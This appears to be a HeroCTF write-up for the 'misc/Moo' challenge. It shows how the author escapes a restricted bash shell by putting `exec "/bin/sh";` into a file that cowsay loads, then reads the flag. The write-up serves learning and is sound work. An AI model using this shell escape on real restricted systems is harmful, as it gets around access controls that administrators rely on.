81 lines
2.4 KiB
Markdown
81 lines
2.4 KiB
Markdown
# misc/Moo
|
|
We are given SSH access to a machine. We drop into a restricted shell and must break out of it to read the flag.
|
|
|
|
```
|
|
ssh -p 11380 dyn05.heroctf.fr
|
|
user@dyn05.heroctf.fr's password:
|
|
Linux moo 6.1.0-25-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.106-3 (2024-08-26) x86_64
|
|
|
|
The programs included with the Debian GNU/Linux system are free software;
|
|
the exact distribution terms for each program are described in the
|
|
individual files in /usr/share/doc/*/copyright.
|
|
|
|
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
|
|
permitted by applicable law.
|
|
Last login: Fri Oct 25 20:27:41 2024 from 149.102.226.202
|
|
______________________________________________________
|
|
/ Welcome dear CTF player! You can read the flag with: \
|
|
\ /bin/sudo /bin/cat /flag.txt. Or can you?... /
|
|
------------------------------------------------------
|
|
\ ^__^
|
|
\ (oo)\_______
|
|
(__)\ )\/\
|
|
||----w |
|
|
|| ||
|
|
```
|
|
|
|
When we try to run the commands, we see we're in a restricted shell:
|
|
```
|
|
user@moo:~$ /bin/sudo /bin/cat /flag.txt
|
|
bash: /bin/sudo: restricted: cannot specify `/' in command names
|
|
```
|
|
|
|
Let's take a look at our environment a bit with `env`:
|
|
```
|
|
bash: env: command not found
|
|
```
|
|
|
|
Next thing to do would be look at what our `PATH` is set to:
|
|
```
|
|
user@moo:~$ echo $PATH
|
|
/usr/local/rbin
|
|
```
|
|
|
|
Attempting to update our `PATH` with `export` fails as well:
|
|
```
|
|
user@moo:~$ PATH=/bin sudo id
|
|
bash: PATH: readonly variable
|
|
bash: sudo: command not found
|
|
```
|
|
|
|
Well, let's see what is actually available to us in the only `PATH` we have available:
|
|
```
|
|
user@moo:~$ ls -la $PATH
|
|
total 24
|
|
drwxr-xr-x 1 root root 4096 Oct 25 18:18 .
|
|
drwxr-xr-x 1 root root 4096 Oct 25 18:18 ..
|
|
lrwxrwxrwx 1 root root 17 Oct 25 18:18 cowsay -> /usr/games/cowsay
|
|
lrwxrwxrwx 1 root root 18 Oct 25 18:18 dircolors -> /usr/bin/dircolors
|
|
lrwxrwxrwx 1 root root 7 Oct 25 18:18 ls -> /bin/ls
|
|
-rwxr-xr-x 1 root root 206 Oct 25 17:35 rbash
|
|
-rwxr-xr-x 1 root root 54 Oct 25 17:35 vim
|
|
```
|
|
|
|
This reveals a few things:
|
|
- We are in a restricted bashshell
|
|
- We have `cowsay`
|
|
|
|
So we use `cowsay` as a the GTFObin that it is, however we cannot redirect output. Luckily we have
|
|
`vim`.
|
|
|
|
After putting our breakout (`exec "/bin/sh";`) into a file, we can then run it with `cowsay`:
|
|
```
|
|
cowsay -f tmp x
|
|
```
|
|
|
|
This gives us a full unrestricted shell, and we can now `cat` the flag:
|
|
```
|
|
PATH=/bin
|
|
Hero{s0m3_s4cr3d_c0w}
|
|
```
|